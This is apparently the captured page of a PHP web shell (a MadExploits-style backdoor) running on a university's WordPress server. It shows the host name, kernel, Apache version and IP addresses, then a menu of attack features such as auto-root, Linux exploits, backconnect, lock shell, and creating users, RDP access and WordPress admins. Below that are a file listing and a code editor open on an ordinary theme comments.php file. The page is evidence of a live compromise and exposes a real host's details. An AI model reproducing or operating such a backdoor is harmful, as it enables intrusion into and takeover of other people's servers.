Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.135.191.228
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
aaou /
wp-content /
themes /
eventalk /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
template-parts
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
woocommerce
[ DIR ]
drwxrwxr-x
404.php
1016
B
-rw-rw-r--
comments.php
4.23
KB
-rw-rw-r--
fallback.php
915
B
-rw-rw-r--
footer.php
363
B
-rw-rw-r--
functions.php
2.32
KB
-rw-rw-r--
header.php
3.22
KB
-rw-rw-r--
index.php
1.76
KB
-rw-rw-r--
page.php
1.02
KB
-rw-rw-r--
screenshot.png
235.13
KB
-rw-rw-r--
search.php
1.08
KB
-rw-rw-r--
sidebar.php
455
B
-rw-rw-r--
single-eventalk_event.php
1.46
KB
-rw-rw-r--
single-eventalk_speaker.php
1.07
KB
-rw-rw-r--
single.php
1.02
KB
-rw-rw-r--
style-editor.css
15.59
KB
-rw-rw-r--
style.css
834
B
-rw-rw-r--
wpml-config.xml
1.75
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * @author RadiusTheme * @since 1.0 * @version 1.0 */ namespace radiustheme\Eventalk; add_filter( 'comment_form_fields', NS . 'move_comment_field_to_bottom' ); function move_comment_field_to_bottom( $fields ) { $temp = $fields['comment']; unset( $fields['comment'] ); $fields['comment'] = $temp; return $fields; } if ( post_password_required() ) { return; } ?> <div id="comments" class="comments-area"> <?php if ( have_comments() ): ?> <?php $rdtheme_comment_count = get_comments_number(); $rdtheme_comments_text = number_format_i18n( $rdtheme_comment_count ) ; if ( $rdtheme_comment_count > 1 ) { $rdtheme_comments_text .= esc_html__( ' Comments', 'eventalk' ); } else{ $rdtheme_comments_text .= esc_html__( ' Comment', 'eventalk' ); } ?> <h3 class="comment-title"><?php echo esc_html( $rdtheme_comments_text );?></h3> <?php $rdtheme_avatar = get_option( 'show_avatars' ); ?> <ul class="comment-list<?php echo empty( $rdtheme_avatar ) ? ' avatar-disabled' : '';?>"> <?php wp_list_comments( array( 'style' => 'ul', 'callback' => 'radiustheme\eventalk\Helper::comments_callback', 'reply_text' => esc_html__( 'Reply', 'eventalk' ), 'avatar_size' => 104, 'format' => 'html5' ) ); ?> </ul> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) :?> <nav class="pagination-area comment-pagination"> <ul> <li><?php previous_comments_link( esc_html__( 'Older Comments', 'eventalk' ) ); ?></li> <li><?php next_comments_link( esc_html__( 'Newer Comments', 'eventalk' ) ); ?></li> </ul> </nav> <?php endif;?> <?php endif;?> <?php if ( ! comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) : ?> <p class="comments-closed"><?php esc_html_e( 'Comments are closed.', 'eventalk' ); ?></p> <?php endif;?> <?php // Start displaying Comment Form $rdtheme_commenter = wp_get_current_commenter(); $rdtheme_req = get_option( 'require_name_email' ); $rdtheme_aria_req = ( $rdtheme_req ? " required" : '' ); $rdtheme_fields = array( 'author' => '<div class="row"><div class="col-sm-4"><div class="form-group comment-form-author"><input type="text" id="author" name="author" value="' . esc_attr( $rdtheme_commenter['comment_author'] ) . '" placeholder="'.esc_attr__( 'Name', 'eventalk' ).( $rdtheme_req ? ' *' : '' ).'" class="form-control"' . $rdtheme_aria_req . '></div></div>', 'email' => '<div class="col-sm-4 comment-form-email"><div class="form-group"><input id="email" name="email" type="email" value="' . esc_attr( $rdtheme_commenter['comment_author_email'] ) . '" class="form-control" placeholder="'.esc_attr__( 'Email', 'eventalk' ).( $rdtheme_req ? ' *' : '' ).'"' . $rdtheme_aria_req . '></div></div>', 'url' => '<div class="col-sm-4 comment-form-website"><div class="form-group"><input id="website" name="website" type="text" value="' . esc_attr( $rdtheme_commenter['comment_author_url'] ) . '" class="form-control" placeholder="'.esc_attr__( 'Website', 'eventalk' ).( $rdtheme_req ? '' : '' ).'"' . $rdtheme_aria_req . '></div></div></div>', ); $rdtheme_args = array( 'class_submit' => 'submit btn-send btn-fill size-md color-yellow border-radius-5', 'submit_field' => '<div class="form-group form-submit">%1$s %2$s</div>', 'comment_field' => '<div class="form-group comment-form-comment"><textarea id="comment" name="comment" required placeholder="'.esc_attr__( 'Comment *', 'eventalk' ).'" class="textarea form-control" rows="10" cols="40"></textarea></div>', 'fields' => apply_filters( 'comment_form_default_fields', $rdtheme_fields ), ); ?> <div class="reply-separator"></div> <?php comment_form( $rdtheme_args );?> </div>
Close